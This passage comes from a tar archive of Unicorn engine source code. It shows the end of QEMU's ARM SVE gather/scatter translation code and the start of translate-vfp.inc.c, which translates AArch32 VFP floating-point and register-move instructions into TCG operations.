gather_load_fn32[be][a->ff][a->xs][a->u][a->msz]; break; case MO_64: fn = gather_load_fn64[be][a->ff][a->xs][a->u][a->msz]; break; } assert(fn != NULL); do_mem_zpz(s, a->rd, a->pg, a->rm, a->scale * a->msz, cpu_reg_sp(s, a->rn), a->msz, fn); return true; } static bool trans_LD1_zpiz(DisasContext *s, arg_LD1_zpiz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_gvec_mem_scatter *fn = NULL; int be = s->be_data == MO_BE; TCGv_i64 imm; if (a->esz < a->msz || (a->esz == a->msz && !a->u)) { return false; } if (!sve_access_check(s)) { return true; } switch (a->esz) { case MO_32: fn = gather_load_fn32[be][a->ff][0][a->u][a->msz]; break; case MO_64: fn = gather_load_fn64[be][a->ff][2][a->u][a->msz]; break; } assert(fn != NULL); /* Treat LD1_zpiz (zn[x] + imm) the same way as LD1_zprz (rn + zm[x]) * by loading the immediate into the scalar parameter. */ imm = tcg_const_i64(tcg_ctx, a->imm << a->msz); do_mem_zpz(s, a->rd, a->pg, a->rn, 0, imm, a->msz, fn); tcg_temp_free_i64(tcg_ctx, imm); return true; } /* Indexed by [be][xs][msz]. */ static gen_helper_gvec_mem_scatter * const scatter_store_fn32[2][2][3] = { /* Little-endian */ { { gen_helper_sve_stbs_zsu, gen_helper_sve_sths_le_zsu, gen_helper_sve_stss_le_zsu, }, { gen_helper_sve_stbs_zss, gen_helper_sve_sths_le_zss, gen_helper_sve_stss_le_zss, } }, /* Big-endian */ { { gen_helper_sve_stbs_zsu, gen_helper_sve_sths_be_zsu, gen_helper_sve_stss_be_zsu, }, { gen_helper_sve_stbs_zss, gen_helper_sve_sths_be_zss, gen_helper_sve_stss_be_zss, } }, }; /* Note that we overload xs=2 to indicate 64-bit offset. */ static gen_helper_gvec_mem_scatter * const scatter_store_fn64[2][3][4] = { /* Little-endian */ { { gen_helper_sve_stbd_zsu, gen_helper_sve_sthd_le_zsu, gen_helper_sve_stsd_le_zsu, gen_helper_sve_stdd_le_zsu, }, { gen_helper_sve_stbd_zss, gen_helper_sve_sthd_le_zss, gen_helper_sve_stsd_le_zss, gen_helper_sve_stdd_le_zss, }, { gen_helper_sve_stbd_zd, gen_helper_sve_sthd_le_zd, gen_helper_sve_stsd_le_zd, gen_helper_sve_stdd_le_zd, } }, /* Big-endian */ { { gen_helper_sve_stbd_zsu, gen_helper_sve_sthd_be_zsu, gen_helper_sve_stsd_be_zsu, gen_helper_sve_stdd_be_zsu, }, { gen_helper_sve_stbd_zss, gen_helper_sve_sthd_be_zss, gen_helper_sve_stsd_be_zss, gen_helper_sve_stdd_be_zss, }, { gen_helper_sve_stbd_zd, gen_helper_sve_sthd_be_zd, gen_helper_sve_stsd_be_zd, gen_helper_sve_stdd_be_zd, } }, }; static bool trans_ST1_zprz(DisasContext *s, arg_ST1_zprz *a) { gen_helper_gvec_mem_scatter *fn = NULL; int be = s->be_data == MO_BE; if (a->esz < a->msz || (a->msz == 0 && a->scale)) { return false; } if (!sve_access_check(s)) { return true; } switch (a->esz) { case MO_32: fn = scatter_store_fn32[be][a->xs][a->msz]; break; case MO_64: fn = scatter_store_fn64[be][a->xs][a->msz]; break; default: g_assert_not_reached(); } do_mem_zpz(s, a->rd, a->pg, a->rm, a->scale * a->msz, cpu_reg_sp(s, a->rn), a->msz, fn); return true; } static bool trans_ST1_zpiz(DisasContext *s, arg_ST1_zpiz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_gvec_mem_scatter *fn = NULL; int be = s->be_data == MO_BE; TCGv_i64 imm; if (a->esz < a->msz) { return false; } if (!sve_access_check(s)) { return true; } switch (a->esz) { case MO_32: fn = scatter_store_fn32[be][0][a->msz]; break; case MO_64: fn = scatter_store_fn64[be][2][a->msz]; break; } assert(fn != NULL); /* Treat ST1_zpiz (zn[x] + imm) the same way as ST1_zprz (rn + zm[x]) * by loading the immediate into the scalar parameter. */ imm = tcg_const_i64(tcg_ctx, a->imm << a->msz); do_mem_zpz(s, a->rd, a->pg, a->rn, 0, imm, a->msz, fn); tcg_temp_free_i64(tcg_ctx, imm); return true; } /* * Prefetches */ static bool trans_PRF(DisasContext *s, arg_PRF *a) { /* Prefetch is a nop within QEMU. */ (void)sve_access_check(s); return true; } static bool trans_PRF_rr(DisasContext *s, arg_PRF_rr *a) { if (a->rm == 31) { return false; } /* Prefetch is a nop within QEMU. */ (void)sve_access_check(s); return true; } /* * Move Prefix * * TODO: The implementation so far could handle predicated merging movprfx. * The helper functions as written take an extra source register to * use in the operation, but the result is only written when predication * succeeds. For unpredicated movprfx, we need to rearrange the helpers * to allow the final write back to the destination to be unconditional. * For predicated zeroing movprfx, we need to rearrange the helpers to * allow the final write back to zero inactives. * * In the meantime, just emit the moves. */ static bool trans_MOVPRFX(DisasContext *s, arg_MOVPRFX *a) { return do_mov_z(s, a->rd, a->rn); } static bool trans_MOVPRFX_m(DisasContext *s, arg_rpr_esz *a) { if (sve_access_check(s)) { do_sel_z(s, a->rd, a->rn, a->rd, a->pg, a->esz); } return true; } static bool trans_MOVPRFX_z(DisasContext *s, arg_rpr_esz *a) { if (sve_access_check(s)) { do_movz_zpz(s, a->rd, a->rn, a->pg, a->esz); } return true; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/translate-vfp.inc.c���������������������������������������������������0000664�0000000�0000000�00000235251�14675241067�0021732�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM translation: AArch32 VFP instructions * * Copyright (c) 2003 Fabrice Bellard * Copyright (c) 2005-2007 CodeSourcery * Copyright (c) 2007 OpenedHand, Ltd. * Copyright (c) 2019 Linaro, Ltd. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * This file is intended to be included from translate.c; it uses * some macros and definitions provided by that file. * It might be possible to convert it to a standalone .c file eventually. */ /* Include the generated VFP decoder */ #include "decode-vfp.inc.c" #include "decode-vfp-uncond.inc.c" /* * The imm8 encodes the sign bit, enough bits to represent an exponent in * the range 01....1xx to 10....0xx, and the most significant 4 bits of * the mantissa; see VFPExpandImm() in the v8 ARM ARM. */ uint64_t vfp_expand_imm(int size, uint8_t imm8) { uint64_t imm = 0; switch (size) { case MO_64: imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) | (extract32(imm8, 6, 1) ? 0x3fc0 : 0x4000) | extract32(imm8, 0, 6); imm <<= 48; break; case MO_32: imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) | (extract32(imm8, 6, 1) ? 0x3e00 : 0x4000) | (extract32(imm8, 0, 6) << 3); imm <<= 16; break; case MO_16: imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) | (extract32(imm8, 6, 1) ? 0x3000 : 0x4000) | (extract32(imm8, 0, 6) << 6); break; default: g_assert_not_reached(); } return imm; } /* * Return the offset of a 16-bit half of the specified VFP single-precision * register. If top is true, returns the top 16 bits; otherwise the bottom * 16 bits. */ static inline long vfp_f16_offset(unsigned reg, bool top) { long offs = vfp_reg_offset(false, reg); #ifdef HOST_WORDS_BIGENDIAN if (!top) { offs += 2; } #else if (top) { offs += 2; } #endif return offs; } /* * Check that VFP access is enabled. If it is, do the necessary * M-profile lazy-FP handling and then return true. * If not, emit code to generate an appropriate exception and * return false. * The ignore_vfp_enabled argument specifies that we should ignore * whether VFP is enabled via FPEXC[EN]: this should be true for FMXR/FMRX * accesses to FPSID, FPEXC, MVFR0, MVFR1, MVFR2, and false for all other insns. */ static bool full_vfp_access_check(DisasContext *s, bool ignore_vfp_enabled) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->fp_excp_el) { if (arm_dc_feature(s, ARM_FEATURE_M)) { gen_exception_insn(s, s->pc_curr, EXCP_NOCP, syn_uncategorized(), s->fp_excp_el); } else { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_fp_access_trap(1, 0xe, false), s->fp_excp_el); } return false; } if (!s->vfp_enabled && !ignore_vfp_enabled) { assert(!arm_dc_feature(s, ARM_FEATURE_M)); unallocated_encoding(s); return false; } if (arm_dc_feature(s, ARM_FEATURE_M)) { /* Handle M-profile lazy FP state mechanics */ /* Trigger lazy-state preservation if necessary */ if (s->v7m_lspact) { /* * Lazy state saving affects external memory and also the NVIC, * so we must mark it as an IO operation for icount. */ if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_v7m_preserve_fp_state(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); } /* * If the preserve_fp_state helper doesn't throw an exception * then it will clear LSPACT; we don't need to repeat this for * any further FP insns in this TB. */ s->v7m_lspact = false; } /* Update ownership of FP context: set FPCCR.S to match current state */ if (s->v8m_fpccr_s_wrong) { TCGv_i32 tmp; tmp = load_cpu_field(tcg_ctx, v7m.fpccr[M_REG_S]); if (s->v8m_secure) { tcg_gen_ori_i32(tcg_ctx, tmp, tmp, R_V7M_FPCCR_S_MASK); } else { tcg_gen_andi_i32(tcg_ctx, tmp, tmp, ~R_V7M_FPCCR_S_MASK); } store_cpu_field(tcg_ctx, tmp, v7m.fpccr[M_REG_S]); /* Don't need to do this for any further FP insns in this TB */ s->v8m_fpccr_s_wrong = false; } if (s->v7m_new_fp_ctxt_needed) { /* * Create new FP context by updating CONTROL.FPCA, CONTROL.SFPA * and the FPSCR. */ TCGv_i32 control, fpscr; uint32_t bits = R_V7M_CONTROL_FPCA_MASK; fpscr = load_cpu_field(tcg_ctx, v7m.fpdscr[s->v8m_secure]); gen_helper_vfp_set_fpscr(tcg_ctx, tcg_ctx->cpu_env, fpscr); tcg_temp_free_i32(tcg_ctx, fpscr); /* * We don't need to arrange to end the TB, because the only * parts of FPSCR which we cache in the TB flags are the VECLEN * and VECSTRIDE, and those don't exist for M-profile. */ if (s->v8m_secure) { bits |= R_V7M_CONTROL_SFPA_MASK; } control = load_cpu_field(tcg_ctx, v7m.control[M_REG_S]); tcg_gen_ori_i32(tcg_ctx, control, control, bits); store_cpu_field(tcg_ctx, control, v7m.control[M_REG_S]); /* Don't need to do this for any further FP insns in this TB */ s->v7m_new_fp_ctxt_needed = false; } } return true; } /* * The most usual kind of VFP access check, for everything except * FMXR/FMRX to the always-available special registers. */ static bool vfp_access_check(DisasContext *s) { return full_vfp_access_check(s, false); } static bool trans_VSEL(DisasContext *s, arg_VSEL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t rd, rn, rm; bool dp = a->dp; if (!dc_isar_feature(aa32_vsel, s)) { return false; } if (dp && !dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (dp && !dc_isar_feature(aa32_simd_r32, s) && ((a->vm | a->vn | a->vd) & 0x10)) { return false; } rd = a->vd; rn = a->vn; rm = a->vm; if (!vfp_access_check(s)) { return true; } if (dp) { TCGv_i64 frn, frm, dest; TCGv_i64 tmp, zero, zf, nf, vf; zero = tcg_const_i64(tcg_ctx, 0); frn = tcg_temp_new_i64(tcg_ctx); frm = tcg_temp_new_i64(tcg_ctx); dest = tcg_temp_new_i64(tcg_ctx); zf = tcg_temp_new_i64(tcg_ctx); nf = tcg_temp_new_i64(tcg_ctx); vf = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, zf, tcg_ctx->cpu_ZF); tcg_gen_ext_i32_i64(tcg_ctx, nf, tcg_ctx->cpu_NF); tcg_gen_ext_i32_i64(tcg_ctx, vf, tcg_ctx->cpu_VF); neon_load_reg64(tcg_ctx, frn, rn); neon_load_reg64(tcg_ctx, frm, rm); switch (a->cc) { case 0: /* eq: Z */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, dest, zf, zero, frn, frm); break; case 1: /* vs: V */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, dest, vf, zero, frn, frm); break; case 2: /* ge: N == V -> N ^ V == 0 */ tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_xor_i64(tcg_ctx, tmp, vf, nf); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, dest, tmp, zero, frn, frm); tcg_temp_free_i64(tcg_ctx, tmp); break; case 3: /* gt: !Z && N == V */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, dest, zf, zero, frn, frm); tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_xor_i64(tcg_ctx, tmp, vf, nf); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, dest, tmp, zero, dest, frm); tcg_temp_free_i64(tcg_ctx, tmp); break; } neon_store_reg64(tcg_ctx, dest, rd); tcg_temp_free_i64(tcg_ctx, frn); tcg_temp_free_i64(tcg_ctx, frm); tcg_temp_free_i64(tcg_ctx, dest); // qq tcg_temp_free_i64(tcg_ctx, zf); tcg_temp_free_i64(tcg_ctx, nf); tcg_temp_free_i64(tcg_ctx, vf); tcg_temp_free_i64(tcg_ctx, zero); } else { TCGv_i32 frn, frm, dest; TCGv_i32 tmp, zero; zero = tcg_const_i32(tcg_ctx, 0); frn = tcg_temp_new_i32(tcg_ctx); frm = tcg_temp_new_i32(tcg_ctx); dest = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, frn, rn); neon_load_reg32(tcg_ctx, frm, rm); switch (a->cc) { case 0: /* eq: Z */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, dest, tcg_ctx->cpu_ZF, zero, frn, frm); break; case 1: /* vs: V */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, dest, tcg_ctx->cpu_VF, zero, frn, frm); break; case 2: /* ge: N == V -> N ^ V == 0 */ tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, dest, tmp, zero, frn, frm); tcg_temp_free_i32(tcg_ctx, tmp); break; case 3: /* gt: !Z && N == V */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, dest, tcg_ctx->cpu_ZF, zero, frn, frm); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, dest, tmp, zero, dest, frm); tcg_temp_free_i32(tcg_ctx, tmp); break; } neon_store_reg32(tcg_ctx, dest, rd); tcg_temp_free_i32(tcg_ctx, frn); tcg_temp_free_i32(tcg_ctx, frm); tcg_temp_free_i32(tcg_ctx, dest); tcg_temp_free_i32(tcg_ctx, zero); } return true; } /* * Table for converting the most common AArch32 encoding of * rounding mode to arm_fprounding order (which matches the * common AArch64 order); see ARM ARM pseudocode FPDecodeRM(). */ static const uint8_t fp_decode_rm[] = { FPROUNDING_TIEAWAY, FPROUNDING_TIEEVEN, FPROUNDING_POSINF, FPROUNDING_NEGINF, }; static bool trans_VRINT(DisasContext *s, arg_VRINT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t rd, rm; bool dp = a->dp; TCGv_ptr fpst; TCGv_i32 tcg_rmode; int rounding = fp_decode_rm[a->rm]; if (!dc_isar_feature(aa32_vrint, s)) { return false; } if (dp && !dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (dp && !dc_isar_feature(aa32_simd_r32, s) && ((a->vm | a->vd) & 0x10)) { return false; } rd = a->vd; rm = a->vm; if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, 0); tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rounding)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); if (dp) { TCGv_i64 tcg_op; TCGv_i64 tcg_res; tcg_op = tcg_temp_new_i64(tcg_ctx); tcg_res = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, tcg_op, rm); gen_helper_rintd(tcg_ctx, tcg_res, tcg_op, fpst); neon_store_reg64(tcg_ctx, tcg_res, rd); tcg_temp_free_i64(tcg_ctx, tcg_op); tcg_temp_free_i64(tcg_ctx, tcg_res); } else { TCGv_i32 tcg_op; TCGv_i32 tcg_res; tcg_op = tcg_temp_new_i32(tcg_ctx); tcg_res = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tcg_op, rm); gen_helper_rints(tcg_ctx, tcg_res, tcg_op, fpst); neon_store_reg32(tcg_ctx, tcg_res, rd); tcg_temp_free_i32(tcg_ctx, tcg_op); tcg_temp_free_i32(tcg_ctx, tcg_res); } gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT(DisasContext *s, arg_VCVT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t rd, rm; bool dp = a->dp; TCGv_ptr fpst; TCGv_i32 tcg_rmode, tcg_shift; int rounding = fp_decode_rm[a->rm]; bool is_signed = a->op; if (!dc_isar_feature(aa32_vcvt_dr, s)) { return false; } if (dp && !dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (dp && !dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } rd = a->vd; rm = a->vm; if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, 0); tcg_shift = tcg_const_i32(tcg_ctx, 0); tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rounding)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); if (dp) { TCGv_i64 tcg_double, tcg_res; TCGv_i32 tcg_tmp; tcg_double = tcg_temp_new_i64(tcg_ctx); tcg_res = tcg_temp_new_i64(tcg_ctx); tcg_tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg64(tcg_ctx, tcg_double, rm); if (is_signed) { gen_helper_vfp_tosld(tcg_ctx, tcg_res, tcg_double, tcg_shift, fpst); } else { gen_helper_vfp_tould(tcg_ctx, tcg_res, tcg_double, tcg_shift, fpst); } tcg_gen_extrl_i64_i32(tcg_ctx, tcg_tmp, tcg_res); neon_store_reg32(tcg_ctx, tcg_tmp, rd); tcg_temp_free_i32(tcg_ctx, tcg_tmp); tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_double); } else { TCGv_i32 tcg_single, tcg_res; tcg_single = tcg_temp_new_i32(tcg_ctx); tcg_res = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tcg_single, rm); if (is_signed) { gen_helper_vfp_tosls(tcg_ctx, tcg_res, tcg_single, tcg_shift, fpst); } else { gen_helper_vfp_touls(tcg_ctx, tcg_res, tcg_single, tcg_shift, fpst); } neon_store_reg32(tcg_ctx, tcg_res, rd); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_single); } gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_i32(tcg_ctx, tcg_shift); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VMOV_to_gp(DisasContext *s, arg_VMOV_to_gp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* VMOV scalar to general purpose register */ TCGv_i32 tmp; int pass; uint32_t offset; /* SIZE == 2 is a VFP instruction; otherwise NEON. */ if (a->size == 2 ? !dc_isar_feature(aa32_fpsp_v2, s) : !arm_dc_feature(s, ARM_FEATURE_NEON)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vn & 0x10)) { return false; } offset = a->index << a->size; pass = extract32(offset, 2, 1); offset = extract32(offset, 0, 2) * 8; if (!vfp_access_check(s)) { return true; } tmp = neon_load_reg(tcg_ctx, a->vn, pass); switch (a->size) { case 0: if (offset) { tcg_gen_shri_i32(tcg_ctx, tmp, tmp, offset); } if (a->u) { gen_uxtb(tmp); } else { gen_sxtb(tmp); } break; case 1: if (a->u) { if (offset) { tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); } else { gen_uxth(tmp); } } else { if (offset) { tcg_gen_sari_i32(tcg_ctx, tmp, tmp, 16); } else { gen_sxth(tmp); } } break; case 2: break; } store_reg(s, a->rt, tmp); return true; } static bool trans_VMOV_from_gp(DisasContext *s, arg_VMOV_from_gp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* VMOV general purpose register to scalar */ TCGv_i32 tmp, tmp2; int pass; uint32_t offset; /* SIZE == 2 is a VFP instruction; otherwise NEON. */ if (a->size == 2 ? !dc_isar_feature(aa32_fpsp_v2, s) : !arm_dc_feature(s, ARM_FEATURE_NEON)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vn & 0x10)) { return false; } offset = a->index << a->size; pass = extract32(offset, 2, 1); offset = extract32(offset, 0, 2) * 8; if (!vfp_access_check(s)) { return true; } tmp = load_reg(s, a->rt); switch (a->size) { case 0: tmp2 = neon_load_reg(tcg_ctx, a->vn, pass); tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, offset, 8); tcg_temp_free_i32(tcg_ctx, tmp2); break; case 1: tmp2 = neon_load_reg(tcg_ctx, a->vn, pass); tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, offset, 16); tcg_temp_free_i32(tcg_ctx, tmp2); break; case 2: break; } neon_store_reg(tcg_ctx, a->vn, pass, tmp); return true; } static bool trans_VDUP(DisasContext *s, arg_VDUP *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* VDUP (general purpose register) */ TCGv_i32 tmp; int size, vec_size; if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vn & 0x10)) { return false; } if (a->b && a->e) { return false; } if (a->q && (a->vn & 1)) { return false; } vec_size = a->q ? 16 : 8; if (a->b) { size = 0; } else if (a->e) { size = 1; } else { size = 2; } if (!vfp_access_check(s)) { return true; } tmp = load_reg(s, a->rt); tcg_gen_gvec_dup_i32(tcg_ctx, size, neon_reg_offset(a->vn, 0), vec_size, vec_size, tmp); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VMSR_VMRS(DisasContext *s, arg_VMSR_VMRS *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = 0; bool ignore_vfp_enabled = false; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (arm_dc_feature(s, ARM_FEATURE_M)) { /* * The only M-profile VFP vmrs/vmsr sysreg is FPSCR. * Accesses to R15 are UNPREDICTABLE; we choose to undef. * (FPSCR -> r15 is a special case which writes to the PSR flags.) */ if (a->rt == 15 && (!a->l || a->reg != ARM_VFP_FPSCR)) { return false; } } switch (a->reg) { case ARM_VFP_FPSID: /* * VFPv2 allows access to FPSID from userspace; VFPv3 restricts * all ID registers to privileged access only. */ if (IS_USER(s) && dc_isar_feature(aa32_fpsp_v3, s)) { return false; } ignore_vfp_enabled = true; break; case ARM_VFP_MVFR0: case ARM_VFP_MVFR1: if (IS_USER(s) || !arm_dc_feature(s, ARM_FEATURE_MVFR)) { return false; } ignore_vfp_enabled = true; break; case ARM_VFP_MVFR2: if (IS_USER(s) || !arm_dc_feature(s, ARM_FEATURE_V8)) { return false; } ignore_vfp_enabled = true; break; case ARM_VFP_FPSCR: break; case ARM_VFP_FPEXC: if (IS_USER(s)) { return false; } ignore_vfp_enabled = true; break; case ARM_VFP_FPINST: case ARM_VFP_FPINST2: /* Not present in VFPv3 */ if (IS_USER(s) || dc_isar_feature(aa32_fpsp_v3, s)) { return false; } break; default: return false; } if (!full_vfp_access_check(s, ignore_vfp_enabled)) { return true; } if (a->l) { /* VMRS, move VFP special register to gp register */ switch (a->reg) { case ARM_VFP_MVFR0: case ARM_VFP_MVFR1: case ARM_VFP_MVFR2: case ARM_VFP_FPSID: if (s->current_el == 1) { TCGv_i32 tcg_reg, tcg_rt; gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tcg_reg = tcg_const_i32(tcg_ctx, a->reg); tcg_rt = tcg_const_i32(tcg_ctx, a->rt); gen_helper_check_hcr_el2_trap(tcg_ctx, tcg_ctx->cpu_env, tcg_rt, tcg_reg); tcg_temp_free_i32(tcg_ctx, tcg_reg); tcg_temp_free_i32(tcg_ctx, tcg_rt); } /* fall through */ case ARM_VFP_FPEXC: case ARM_VFP_FPINST: case ARM_VFP_FPINST2: tmp = load_cpu_field(tcg_ctx, vfp.xregs[a->reg]); break; case ARM_VFP_FPSCR: if (a->rt == 15) { tmp = load_cpu_field(tcg_ctx, vfp.xregs[ARM_VFP_FPSCR]); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xf0000000); } else { tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_get_fpscr(tcg_ctx, tmp, tcg_ctx->cpu_env); } break; default: g_assert_not_reached(); } if (a->rt == 15) { /* Set the 4 flag bits in the CPSR. */ gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp); } else { store_reg(s, a->rt, tmp); } } else { /* VMSR, move gp register to VFP special register */ switch (a->reg) { case ARM_VFP_FPSID: case ARM_VFP_MVFR0: case ARM_VFP_MVFR1: case ARM_VFP_MVFR2: /* Writes are ignored. */ break; case ARM_VFP_FPSCR: tmp = load_reg(s, a->rt); gen_helper_vfp_set_fpscr(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_lookup_tb(s); break; case ARM_VFP_FPEXC: /* * TODO: VFP subarchitecture support. * For now, keep the EN bit only */ tmp = load_reg(s, a->rt); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 1 << 30); store_cpu_field(tcg_ctx, tmp, vfp.xregs[a->reg]); gen_lookup_tb(s); break; case ARM_VFP_FPINST: case ARM_VFP_FPINST2: tmp = load_reg(s, a->rt); store_cpu_field(tcg_ctx, tmp, vfp.xregs[a->reg]); break; default: g_assert_not_reached(); } } return true; } static bool trans_VMOV_single(DisasContext *s, arg_VMOV_single *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!vfp_access_check(s)) { return true; } if (a->l) { /* VFP to general purpose register */ tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vn); if (a->rt == 15) { /* Set the 4 flag bits in the CPSR. */ gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp); } else { store_reg(s, a->rt, tmp); } } else { /* general purpose register to VFP */ tmp = load_reg(s, a->rt); neon_store_reg32(tcg_ctx, tmp, a->vn); tcg_temp_free_i32(tcg_ctx, tmp); } return true; } static bool trans_VMOV_64_sp(DisasContext *s, arg_VMOV_64_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* * VMOV between two general-purpose registers and two single precision * floating point registers */ if (!vfp_access_check(s)) { return true; } if (a->op) { /* fpreg to gpreg */ tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); store_reg(s, a->rt, tmp); tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm + 1); store_reg(s, a->rt2, tmp); } else { /* gpreg to fpreg */ tmp = load_reg(s, a->rt); neon_store_reg32(tcg_ctx, tmp, a->vm); tcg_temp_free_i32(tcg_ctx, tmp); tmp = load_reg(s, a->rt2); neon_store_reg32(tcg_ctx, tmp, a->vm + 1); tcg_temp_free_i32(tcg_ctx, tmp); } return true; } static bool trans_VMOV_64_dp(DisasContext *s, arg_VMOV_64_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; /* * VMOV between two general-purpose registers and one double precision * floating point register. Note that this does not require support * for double precision arithmetic. */ if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } if (a->op) { /* fpreg to gpreg */ tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm * 2); store_reg(s, a->rt, tmp); tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm * 2 + 1); store_reg(s, a->rt2, tmp); } else { /* gpreg to fpreg */ tmp = load_reg(s, a->rt); neon_store_reg32(tcg_ctx, tmp, a->vm * 2); tcg_temp_free_i32(tcg_ctx, tmp); tmp = load_reg(s, a->rt2); neon_store_reg32(tcg_ctx, tmp, a->vm * 2 + 1); 